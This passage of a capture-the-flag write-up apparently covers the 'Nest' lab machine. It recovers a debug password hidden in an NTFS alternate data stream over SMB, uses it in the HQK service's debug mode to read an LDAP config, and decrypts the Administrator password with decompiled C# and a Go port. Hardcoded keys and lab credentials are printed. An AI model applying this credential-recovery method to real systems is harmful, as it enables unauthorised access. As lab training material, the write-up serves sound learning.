smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> 

We can see that it has another data stream called Password; let's try to download it:

smb: get "Debug Mode Password.txt":password
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:password of size 15 as Debug Mode Password.txt:password (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

It has the following content: "WBQ201953D8w"
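The file looked empty in dir and smbget because those only report the default stream. The following Go program is an added example, not the author's code: it parses allinfo output in the format shown above and flags files whose default stream is empty while a named stream carries data, which is exactly how the debug password was hidden here. The sample output is constructed from the listing above.

```go
package main

import (
	"regexp"
	"strconv"
	"strings"
)

// Constructed sample in the format smbclient's allinfo prints (modelled on the session above, not a live capture).
const sampleAllinfo = `altname: DEBUGM~1.TXT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
`

// Matches "stream: [:<name>:$DATA], <n> bytes"; <name> is empty for the default stream.
var streamRe = regexp.MustCompile(`^stream: \[:([^:\]]*):\$DATA\], (\d+) bytes$`)

// ParseStreams returns the size of the unnamed default stream (the size that dir and
// smbget report) and a name -> size map of every additional named stream.
func ParseStreams(allinfo string) (defaultSize int, named map[string]int) {
	named = map[string]int{}
	for _, line := range strings.Split(allinfo, "\n") {
		m := streamRe.FindStringSubmatch(strings.TrimSpace(line))
		if m == nil {
			continue // altname, timestamps, attributes: not a stream line
		}
		size, _ := strconv.Atoi(m[2]) // \d+ already guarantees digits
		if m[1] == "" {
			defaultSize = size
		} else {
			named[m[1]] = size
		}
	}
	return defaultSize, named
}

// HidesData flags the pattern seen on this box: a file that looks empty in a
// directory listing but carries content in a named stream.
func HidesData(allinfo string) bool {
	defaultSize, named := ParseStreams(allinfo)
	for _, size := range named {
		if defaultSize == 0 && size > 0 {
			return true
		}
	}
	return false
}
```

Run it over the allinfo output of every file on a share to spot ADS-backed files that a plain listing hides.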

Let's go back to HQK:

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug xRxRxPANCAK3SxRxRx

Invalid password entered
>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>session

--- Session Information ---

Session ID: 26ecec2e-c357-4860-8f29-d8045141cb6a
Debug: True
Started At: 6/2/2020 4:19:47 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.16.87:33366
Current Query Directory: C:\Program Files\HQK\ALL QUERIES

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>cd LDAP

Unrecognised command
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

That took a bit of luck. I had to navigate with setdir and list in debug mode to understand it and find Ldap.conf. Once again we find an encrypted password, and this time an .exe as well, which may be another VB program. Let's try to decompile it with https://github.com/icsharpcode/AvaloniaILSpy - If you have trouble installing Avalonia ILSpy.

If you decompile it with AvaloniaILSpy, using the .exe as input, you can look at the main module and see the following:

        else if (text.StartsWith("Password=", StringComparison.CurrentCultureIgnoreCase))
        {
                ldapSearchSettings.Password = CR.DS(text.Substring(text.IndexOf('=') + 1));
        }

This looks like the function used to decrypt the password, CR.DS. If we build our own version:

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class CR
{
        private const string K = "667912";

        private const string I = "1L1SA61493DRV53Z";

        private const string SA = "1313Rf99";

        public static string DS(string EncryptedString)
        {
                if (string.IsNullOrEmpty(EncryptedString))
                {
                        return string.Empty;
                }
                return RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

        private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
        {
                byte[] bytes = Encoding.ASCII.GetBytes(initVector);
                byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
                byte[] array = Convert.FromBase64String(cipherText);
                Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
                checked
                {
                        byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
                        AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
                        aesCryptoServiceProvider.Mode = CipherMode.CBC;
                        ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes);
                        MemoryStream memoryStream = new MemoryStream(array);
                        CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
                        byte[] array2 = new byte[array.Length + 1];
                        int count = cryptoStream.Read(array2, 0, array2.Length);
                        memoryStream.Close();
                        cryptoStream.Close();
                        return Encoding.ASCII.GetString(array2, 0, count);
                }
        }
}

public class Program
{
        public static void Main()
        {
                Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
        }
}

The output will be: XtH4nkS4Pl4y1nGX (we used dotnetfiddle.net again)
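The same routine, both the VB DecryptString above and CR.DS, ported to Go as an added example (not the author's or the box's code) so it can be run without .NET: PBKDF2-HMAC-SHA1 is reimplemented with the standard library, then AES-CBC with the fixed IV and PKCS#7 removal. The point for defenders is that the only inputs are the constants lifted from HqkLdap.exe (6-digit passphrase, 3 iterations, static salt and IV), so anyone holding the binary can reverse the "encrypted" config value.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"errors"
)

// pbkdf2SHA1 is PBKDF2 with HMAC-SHA1, the default PRF of .NET's Rfc2898DeriveBytes.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) (out []byte) {
	for block := 1; len(out) < keyLen; block++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write([]byte{0, 0, 0, byte(block)}) // big-endian block index (fine below 256 blocks)
		t, u := mac.Sum(nil), mac.Sum(nil)      // T = U1; u then walks U2..Uc
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// Decrypt mirrors the VB DecryptString / C# RD routine: PBKDF2 key, AES-CBC with the fixed IV, PKCS#7 removed.
func Decrypt(cipherText, passPhrase, saltValue string, iterations int, initVector string, keySize int) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(cipherText)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 || len(initVector) != aes.BlockSize || (keySize != 128 && keySize != 192 && keySize != 256) {
		return "", errors.New("ciphertext, IV or key size is not valid for AES-CBC")
	}
	blk, _ := aes.NewCipher(pbkdf2SHA1([]byte(passPhrase), []byte(saltValue), iterations, keySize/8)) // key size validated above
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(blk, []byte(initVector)).CryptBlocks(pt, ct)
	if pad := int(pt[len(pt)-1]); pad == 0 || pad > aes.BlockSize {
		return "", errors.New("bad PKCS#7 padding (wrong key material?)")
	}
	return string(pt[:len(pt)-int(pt[len(pt)-1])]), nil
}

// DS is CR.DS from HqkLdap.exe: passphrase, salt, IV and iteration count are all baked into the binary.
func DS(encrypted string) (string, error) {
	return Decrypt(encrypted, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
}
```

DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=") returns the same XtH4nkS4Pl4y1nGX the C# version printed; the RU_config.xml value can be fed to Decrypt with the parameters from that file.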

With that we can access the Administrator's files and the administrator flag.

I hope this is useful, Matheus